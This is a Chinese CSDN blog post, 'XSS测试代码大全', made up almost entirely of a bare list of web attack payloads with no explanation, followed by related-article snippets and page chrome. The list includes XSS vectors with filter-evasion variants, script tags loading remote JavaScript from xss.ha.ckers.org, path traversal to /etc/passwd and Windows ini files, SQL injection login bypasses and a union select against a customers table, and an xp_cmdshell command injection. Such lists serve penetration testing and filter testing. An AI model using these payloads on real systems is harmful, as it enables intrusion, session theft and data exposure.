XSS测试代码大全

最新推荐文章于 2024-02-27 16:44:58 发布
最新推荐文章于 2024-02-27 16:44:58 发布
阅读量2.3k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38778137/article/details/85472531
版权 
'><script>alert(document.cookie)</script> 

='><script>alert(document.cookie)</script> 

<script>alert(document.cookie)</script> 

<script>alert(vulnerable)</script> 

%3Cscript%3Ealert('XSS')%3C/script%3E 

<script>alert('XSS')</script> 

<img src="javascript:alert('XSS')"> 

%0a%0a<script>alert(\"Vulnerable\")</script>.jsp 

%22%3cscript%3ealert(%22xss%22)%3c/script%3e 

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini 

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html 

%3f.jsp 

<script>alert('Vulnerable');</script> 

<script>alert('Vulnerable')</script> 

?sql_debug=1 

a%5c.aspx 

a.jsp/<script>alert('Vulnerable')</script> 

a/ 

a?<script>alert('Vulnerable')</script> 

"><script>alert('Vulnerable')</script> 

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& 

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 

%3Cscript%3Ealert(document. domain);%3C/script%3E& 

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 

1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= 

../../../../../../../../etc/passwd 

..\..\..\..\..\..\..\..\windows\system.ini 

\..\..\..\..\..\..\..\..\windows\system.ini 

'';!--"<XSS>=&{()} 

<IMG src="javascript:alert('XSS');"> 

<IMG src=javascript:alert('XSS')> 

<IMG src=JaVaScRiPt:alert('XSS')> 

<IMG src=JaVaScRiPt:alert("XSS")> 

<IMG src=javascript:alert('XSS')> 

<IMG src=javascript:alert('XSS')> 

<IMG src=javascript:alert('XSS')> 

<IMG src="jav ascript:alert('XSS');"> 

<IMG src="jav ascript:alert('XSS');"> 

<IMG src="jav ascript:alert('XSS');"> 

"<IMG src=java\0script:alert(\"XSS\")>";' > 

<IMG src=" javascript:alert('XSS');"> 

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> 

<BODY BACKGROUND="javascript:alert('XSS')"> 

<BODY ONLOAD=alert('XSS')> 

<IMG DYNSRC="javascript:alert('XSS')"> 

<IMG LOWSRC="javascript:alert('XSS')"> 

<BGSOUND src="javascript:alert('XSS');"> 

<br size="&{alert('XSS')}"> 

<LAYER src="http://xss.ha.ckers.org/a.js"></layer> 

<LINK REL="stylesheet" href="javascript:alert('XSS');"> 

<IMG src='vbscript:msgbox("XSS")'> 

<IMG src="mocha:[code]"> 

<IMG src="livescript:[code]"> 

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> 

<IFRAME src=javascript:alert('XSS')></IFRAME> 

<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET> 

<TABLE BACKGROUND="javascript:alert('XSS')"> 

<DIV STYLE="background-image: url(javascript:alert('XSS'))"> 

<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"> 

<DIV STYLE="width: expression(alert('XSS'));"> 

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> 

<IMG STYLE='xss:expre\ssion(alert("XSS"))'> 

<STYLE TYPE="text/javascript">alert('XSS');</STYLE> 

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> 

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> 

<BASE href="javascript:alert('XSS');//"> 

getURL("javascript:alert('XSS')") 

a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); 

<XML src="javascript:alert('XSS');"> 

"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><" 

<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT> 

<IMG src="javascript:alert('XSS')" 

<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"--> 

<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> 

<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 

<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 

<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT> 

<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 

<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT> 

<A href=http://www.gohttp://www.google.com/ogle.com/>link</A> 

admin'-- 

' or 0=0 -- 

" or 0=0 -- 

or 0=0 -- 

' or 0=0 # 

" or 0=0 # 

or 0=0 # 

' or 'x'='x 

" or "x"="x 

') or ('x'='x 

' or 1=1-- 

" or 1=1-- 

or 1=1-- 

' or a=a-- 

" or "a"="a 

') or ('a'='a 

") or ("a"="a 

hi" or "a"="a 

hi" or 1=1 -- 

hi' or 1=1 -- 

hi' or 'a'='a 

hi') or ('a'='a 

hi") or ("a"="a[/code]
qq_38778137
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss测试代码大全javascript中的xss过滤
03-24
xss测试代码大全
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
Web安全:XSS漏洞的测试(防止 黑客利用此漏洞.)
热门推荐
网络安全领域___专研者.
03-17 1万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
XSS -- 三种基本漏洞 (浅谈)
thj_blog
11-13 7160
一、  XSS 漏洞的验证         我们可以用一段简单的代码,验证和检测漏洞的存在,这样的代码叫做PoC(Proof of Concept)。验证XSS 漏洞存在的PoC 如下:               (1)&lt;script&gt;alert(/xss/)&lt;/script&gt;                      (2)&lt;script&gt;confirm('...
渗透测试CISP-PTE:XSS
最新发布
未知2066的博客
02-27 886
XSS (Cross-Site Scripting) 攻击是一种利用 Web 应用程序的漏洞,通过在用户输入的数据中注入恶意脚本来实施攻击的方法。
xss 验证
qq284489030的博客
12-01 600
test
XSS测试代码
Tianyi_liang的博客
03-13 1149
XSS测试代码收集
XSS 跨站测试代码大全2
LIVE
11-07 1253
0x01 XSS介绍 1. XSS分类 (1) 反射型XSS、 (2)存储型XSS、 (3)Dom型XSS、 (4) 通用型XSS、(全称Universal Cross-Site Scripting,翻译过来就是通用型XSS 简称UXSS) (5) 突变型XSS ( 介绍: mXS()突变 XSS) 是当不可信数据在 DOM 的 innerHTML 属性的上下文被处理并通过浏览器发生突变,...
XSS跨站测试代码大全
xysoul的专栏
04-13 6285
'>alert(document.cookie)   ='>alert(document.cookie)   alert(document.cookie)   alert(vulnerable)   %3Cscript%3Ealert('XSS')%3C/script%3E   alert('XSS')      %0a%0aalert(\"Vulnerable\").jsp
XSS测试语句大全
08-07
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
基于爬虫开发XSS检测程序-代码.rar
04-10
基于爬虫开发XSS检测程序-代码
安全测试xss攻击通用测试用例
测试开发
04-12 644
安全测试,测xss攻击,一个通用case测出一类问题。测试开发同学可以关注一下
XSS 攻击常用代码
高压锅博客
12-22 7084
【代码】XSS 攻击常用代码。
xss代码集
Sylon的博客
10-09 3538
</script>"><script>prompt(1)</script> </ScRiPt>"><ScRiPt>prompt(1)</ScRiPt> "><img src=x onerror=prompt(1)> "><svg/onload=prompt(1)> ">&l...
常用xss代码以及绕过
csviking的博客
11-18 7628
常规xss的代码 "OnMoUsEoVeR=prompt(1)// #一般用于表单框插入比较好 "-prompt(1)-" # URL删除参数,列如id=1 xss添加为id="-prompt(1)-"
代码审计——XSS详解
Boom!脑洞大爆炸的博客
06-17 1934
代码审计之XSS详解
xss payload
07-15 375
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerab...
生成安全测试xss注入代码测试vue页面
06-07
您可以使用一些自动化测试工具来生成安全测试XSS注入代码测试Vue页面。其中一个常用的工具是OWASP ZAP,它可以自动生成XSS注入代码并测试Vue页面的安全性。另外,您也可以手动编写XSS注入代码并在Vue页面中进行测试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值